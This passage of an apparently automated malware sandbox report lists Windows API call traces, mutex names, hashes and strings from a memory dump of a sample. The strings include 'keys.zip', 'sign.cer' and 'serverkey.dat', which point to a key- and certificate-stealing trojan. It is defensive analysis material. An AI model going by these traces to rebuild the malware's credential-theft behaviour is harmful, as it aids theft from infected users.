                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012FCC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: 61C5C0CB$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Mw
                                                                                                                                                                                                              • API String ID: 3206501308-1030087416
                                                                                                                                                                                                              • Opcode ID: d957d7f945c4bb0bf365706a0a56deb182c3130557f5ef2323f3594d133a3980
                                                                                                                                                                                                              • Instruction ID: 744831d7d31cfb5160bf6ff591056268d6af29cb333c8407aa4d071398f896fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d957d7f945c4bb0bf365706a0a56deb182c3130557f5ef2323f3594d133a3980
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79F0F63065A3196FD6327B60DC0AF9EB79C6F45B15F00411CFB55A22C5DBB485048B66
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2190258309-0
                                                                                                                                                                                                              • Opcode ID: c8f44c9fb228695a0f699f16d70269a7d3ae973bec1059e5723f9ebdf8fa7d6c
                                                                                                                                                                                                              • Instruction ID: 02e5c2c43bbcd2552ac36a7d0accbe3edc2ae68a8af9d4430c37e7d1c84a6b24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8f44c9fb228695a0f699f16d70269a7d3ae973bec1059e5723f9ebdf8fa7d6c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D41B0B0900711CBD732DFA8F890A5AB7ECBB84B14F9A0579E5594B748D331A840DFD5
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d7a8f8d4463b6708be10d72f8081fb5fb3d80875e49f8237a0d527f3b715b98d
                                                                                                                                                                                                              • Instruction ID: 7e15b99d97ef4228190250a55b0574d24f233519dc145b9c0c279abf245181f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7a8f8d4463b6708be10d72f8081fb5fb3d80875e49f8237a0d527f3b715b98d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62C10431A10617DFCB25CF28C894AAABBB5FF49340F5082ACEF569B345D731AA15C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,000008F4,00000000,00000000,00000000), ref: 01305C71
                                                                                                                                                                                                              • memset.MSVCRT(000008F4,00000000,000000F4,00000000,00000000,000008F4,00000000,00000000,00000000), ref: 01305C85
                                                                                                                                                                                                              • memset.MSVCRT(000009E8,00000000,00000480,000008F4,00000000,000000F4,00000000,00000000,000008F4,00000000,00000000,00000000), ref: 01305C97
                                                                                                                                                                                                              • memset.MSVCRT(00000E68,00000000,00000078,000009E8,00000000,00000480,000008F4,00000000,000000F4,00000000,00000000,000008F4,00000000,00000000,00000000), ref: 01305CA6
                                                                                                                                                                                                              • memset.MSVCRT(00000EE0,00000000,0000009C,00000E68,00000000,00000078,000009E8,00000000,00000480,000008F4,00000000,000000F4,00000000,00000000,000008F4,00000000), ref: 01305CB8
                                                                                                                                                                                                              • memset.MSVCRT(00000FF0,00000000,000008F4,00000EE0,00000000,0000009C,00000E68,00000000,00000078,000009E8,00000000,00000480,000008F4,00000000,000000F4,00000000), ref: 01305CFC
                                                                                                                                                                                                              • memset.MSVCRT(000018EC,00000000,0000023D), ref: 01305D1D
                                                                                                                                                                                                              • memset.MSVCRT(00001B29,00000000,00000100,000018EC,00000000,0000023D), ref: 01305D2F
                                                                                                                                                                                                              • memset.MSVCRT(00001C29,00000000,00000200,00001B29,00000000,00000100,000018EC,00000000,0000023D), ref: 01305D41
                                                                                                                                                                                                              • memset.MSVCRT(00001E2C,00000000,00000074,00001C29,00000000,00000200,00001B29,00000000,00000100,000018EC,00000000,0000023D), ref: 01305D50
                                                                                                                                                                                                              • memset.MSVCRT(00001EA0,00000000,00000078,00001E2C,00000000,00000074,00001C29,00000000,00000200,00001B29,00000000,00000100,000018EC,00000000,0000023D), ref: 01305D5F
                                                                                                                                                                                                              • memset.MSVCRT(00001F18,00000000,00008000,00001EA0,00000000,00000078,00001E2C,00000000,00000074,00001C29,00000000,00000200,00001B29,00000000,00000100,000018EC), ref: 01305D71
                                                                                                                                                                                                              • memset.MSVCRT(00009F18,00000000,00010000), ref: 01305D86
                                                                                                                                                                                                              • memset.MSVCRT(00019F18,00000000,00001000,00009F18,00000000,00010000), ref: 01305D98
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                              • Opcode ID: 1347a9eda94685352da68b98ea0889dad22bcb530b6a4ab54b0bc887a48472a9
                                                                                                                                                                                                              • Instruction ID: 7ae43e0bca5be33fc6fd329bc123a1f9114e40f3237edfbaf909cb1b78f48163
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1347a9eda94685352da68b98ea0889dad22bcb530b6a4ab54b0bc887a48472a9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36513EB1D41255AACF10DFA4C884BEA7BB8BF18344F04817AED0CAF286D7B45245CBE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D098), ref: 01303B70
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303BB1
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01303BBB
                                                                                                                                                                                                              • #680.SHELL32 ref: 01303BC3
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01303BD4
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303BDB
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01303BE8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D098,?,?), ref: 01303C57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorLast$#680CreateCurrentFolderMakeSystem
                                                                                                                                                                                                              • String ID: keys.zip$path1.txt
                                                                                                                                                                                                              • API String ID: 1796575131-1274251082
                                                                                                                                                                                                              • Opcode ID: 63b9fa5cf8cfb48dd939901760284fd815d6e7eedb2792d8627ecb57836e0b92
                                                                                                                                                                                                              • Instruction ID: 889da161bdd776c71953bcb5d057825f8562560154ec0e08b859951241ce1a14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63b9fa5cf8cfb48dd939901760284fd815d6e7eedb2792d8627ecb57836e0b92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9041E5702046554FCB36DF3998B8BEABBE8FF96304F148098E98AC7341DA71D948C794
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WindowFromDC.USER32(?), ref: 012EC31C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EC354
                                                                                                                                                                                                              • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 012EC362
                                                                                                                                                                                                              • GetClipRgn.GDI32(?,00000000), ref: 012EC36C
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 012EC37C
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 012EC383
                                                                                                                                                                                                              • GetViewportOrgEx.GDI32(?,?), ref: 012EC38E
                                                                                                                                                                                                              • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 012EC3A2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012EC3E3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 3315380975-1167384825
                                                                                                                                                                                                              • Opcode ID: f940f12afe150d34d7947f82c4ce27a5a27f1b937d63a69bc9314a77ac7136ae
                                                                                                                                                                                                              • Instruction ID: 9d4805bd13a1c4dc00ca07b7b396b9d1b7c9a458d6001a44e16dd8189bbb2ad3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f940f12afe150d34d7947f82c4ce27a5a27f1b937d63a69bc9314a77ac7136ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC41D2B6211205ABDB24DFA9DC88DAB77ADEB8C711F00860DFA19D3244D634E950CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF5B9
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF633
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 012FF63E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14},00000006), ref: 012FF65B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FF662
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FF674
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FF685
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CopyFileHandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                              • String ID: Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Mw$sign.cer
                                                                                                                                                                                                              • API String ID: 2434762175-1812296212
                                                                                                                                                                                                              • Opcode ID: f515fcd6db2b73289838f169a3943e97c2ae6023d4b68c3989cbed27bebdb251
                                                                                                                                                                                                              • Instruction ID: f84b57d9e2e19efb4c099af7b844f359502e28b929f3a3fc19780b15a6819904
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f515fcd6db2b73289838f169a3943e97c2ae6023d4b68c3989cbed27bebdb251
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD3108315543465FD7325F289928F96BFD4AF5A705F19809CEB898F362DA70C008CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 012E7A0F
                                                                                                                                                                                                                • Part of subcall function 01304880: OpenProcess.KERNEL32(00000400,00000000,00000000,774CF550,00000000,7765C3F0), ref: 01304895
                                                                                                                                                                                                                • Part of subcall function 01304880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048AC
                                                                                                                                                                                                                • Part of subcall function 01304880: GetTokenInformation.ADVAPI32(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 013048CA
                                                                                                                                                                                                                • Part of subcall function 01304880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,012F58B3), ref: 013048E2
                                                                                                                                                                                                                • Part of subcall function 01304880: GetHandleInformation.KERNEL32(?,00000000), ref: 0130493B
                                                                                                                                                                                                                • Part of subcall function 01304880: CloseHandle.KERNEL32(?), ref: 0130494C
                                                                                                                                                                                                                • Part of subcall function 01304880: GetHandleInformation.KERNEL32(00000000,?), ref: 0130495E
                                                                                                                                                                                                                • Part of subcall function 01304880: CloseHandle.KERNEL32(00000000), ref: 0130496F
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012E7A1E
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 012E7A37
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 012E7A3E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,9e2b3b2da), ref: 012E7A54
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012E7A99
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00000104,Global\HighMemoryEvent_%08x,?,?,00000000,00000103), ref: 012E7AB3
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 012E7AC6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleInformation$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                              • String ID: 9e2b3b2da$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                              • API String ID: 3631320848-992867637
                                                                                                                                                                                                              • Opcode ID: d9785f470e0c89c36576bc9914e6e0ef9de32965f8a363bc3634f45a48299b6c
                                                                                                                                                                                                              • Instruction ID: ea2984a5cb3676c7a4a41e2dbf3672011ea49e57c47f15ab7c79f9b091cc97a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9785f470e0c89c36576bc9914e6e0ef9de32965f8a363bc3634f45a48299b6c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A63182725102169BE730DE94DC49BAAB7ACEF44B11F544049FF4497380E7F0AA84CBE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000DE,00000000,00000000), ref: 01305124
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 01305133
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0130513A
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110,?,00000000,00000000), ref: 01305152
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000), ref: 01305169
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0130516F
                                                                                                                                                                                                                • Part of subcall function 012F41E0: GetProcessHeap.KERNEL32(00000008,01305097,00000000,759834D0,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F41FE
                                                                                                                                                                                                                • Part of subcall function 012F41E0: HeapAlloc.KERNEL32(00000000,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4205
                                                                                                                                                                                                                • Part of subcall function 012F41E0: memset.MSVCRT(00000000,00000000,01305097,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4215
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104,00000104,?,?,?,?,00000000,00000000), ref: 01305190
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013051B7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 013051CB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 01305100
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$AllocComputerNameProcess$ErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                                                                                                                                                                                                              • API String ID: 734199406-1705633369
                                                                                                                                                                                                              • Opcode ID: 41e604e1df03dae4893170020faeb91e86d99d3a6ef5727464ed8c128f6e2208
                                                                                                                                                                                                              • Instruction ID: a3207f995ac337586f42cea6f164ba4bca8f486f84fded5df9d256afb5140965
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41e604e1df03dae4893170020faeb91e86d99d3a6ef5727464ed8c128f6e2208
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75213871900215A7DF27AA689C44BFBB7FC9F84705F200458FA45971C4EBB0AA008BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(01339F08,00000000,00000104,774CF550,00000000), ref: 012F2587
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,774CF550,00000000), ref: 012F259E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,774CF550,00000000), ref: 012F25AB
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?,?,774CF550,00000000), ref: 012F25E7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(01339F08,00000000,00000104,00000000,00000001,?,774CF550,00000000), ref: 012F2611
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,774CF550,00000000), ref: 012F2620
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,774CF550,00000000), ref: 012F2623
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,774CF550,00000000), ref: 012F2630
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,774CF550,00000000), ref: 012F2633
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID: 9e2b3e8fa
                                                                                                                                                                                                              • API String ID: 780088666-1329805938
                                                                                                                                                                                                              • Opcode ID: 214b8bc4f0422a1c2da4e93a6eb0065b23223fd70ace9b667bdc76f2105f84da
                                                                                                                                                                                                              • Instruction ID: 70ce79c5cc7221b08417ad1dfb44fcd9e35007ba0a6d3fd9283fabe7a6a03997
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 214b8bc4f0422a1c2da4e93a6eb0065b23223fd70ace9b667bdc76f2105f84da
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE110671640315A7DB316A385C1DFEBBA6CAB91B12F004158F785EB2C0DEE0D9848BE4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012E74A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,9e2b3e8fa,7765C3F0,?,?,012F2600,00000000,00000001), ref: 012E74C6
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E74E4
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E750D
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapAlloc.KERNEL32(00000000,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7514
                                                                                                                                                                                                                • Part of subcall function 012E74A0: memset.MSVCRT(00000000,00000000,00000001,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7527
                                                                                                                                                                                                                • Part of subcall function 012E74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E7553
                                                                                                                                                                                                                • Part of subcall function 012E74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7563
                                                                                                                                                                                                                • Part of subcall function 012E74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 012E7572
                                                                                                                                                                                                                • Part of subcall function 012E74A0: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7585
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E7594
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapValidate.KERNEL32(00000000), ref: 012E759B
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL ref: 013053BE
                                                                                                                                                                                                              • GetTickCount.KERNEL32(?,?,012F56AF), ref: 013053D2
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,012F56AF), ref: 013053E3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform,?,?,012F56AF), ref: 013053F3
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,012F56AF), ref: 01305430
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,012F56AF), ref: 01305433
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,012F56AF), ref: 01305440
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,012F56AF), ref: 01305443
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$Validate$AddressAllocCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1595973673-3277137149
                                                                                                                                                                                                              • Opcode ID: a416a46c03a86a7f5f0e605492115bf63d7da60bf7523822efbbea71f3e9542c
                                                                                                                                                                                                              • Instruction ID: 12ea6e31d285267e3c6648f43cc9d0153546fd3bd249882aca631e464950ce8e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a416a46c03a86a7f5f0e605492115bf63d7da60bf7523822efbbea71f3e9542c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94118E31741311ABEB31BF7A9C09FDB7AACEF85716F158528F905E6284DB35D6008BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0132A450,775B5180,012E1350,?,serverkey.dat), ref: 01300121
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0132A488,?,serverkey.dat), ref: 01300131
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0132A4B8,?,serverkey.dat), ref: 01300141
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0132A4D8,?,serverkey.dat), ref: 01300151
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0132A450,?,serverkey.dat), ref: 01300161
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0132A488,?,serverkey.dat), ref: 01300171
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0132A4B8,?,serverkey.dat), ref: 01300181
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0132A4D8,?,serverkey.dat), ref: 01300191
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindWindow
                                                                                                                                                                                                              • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                              • API String ID: 134000473-1757792087
                                                                                                                                                                                                              • Opcode ID: eadf578e099ccd5256a2c3f3c2f98c49e650f4902c6f222ecb3bdb9f85ce7fb3
                                                                                                                                                                                                              • Instruction ID: 0c0618aade3b166cca33dfee8a6e1fae97189ba4276b9f20c9a14218d90cdac1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eadf578e099ccd5256a2c3f3c2f98c49e650f4902c6f222ecb3bdb9f85ce7fb3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97F059B87C2336AAD51A716F2D1AF6639C40B94CCD741401DF8C5B7B45E694E44115B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 012FB91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FB925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FB939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FB94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f), ref: 012FB956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61c5c09f,ALPHA), ref: 012FB970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012FB976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
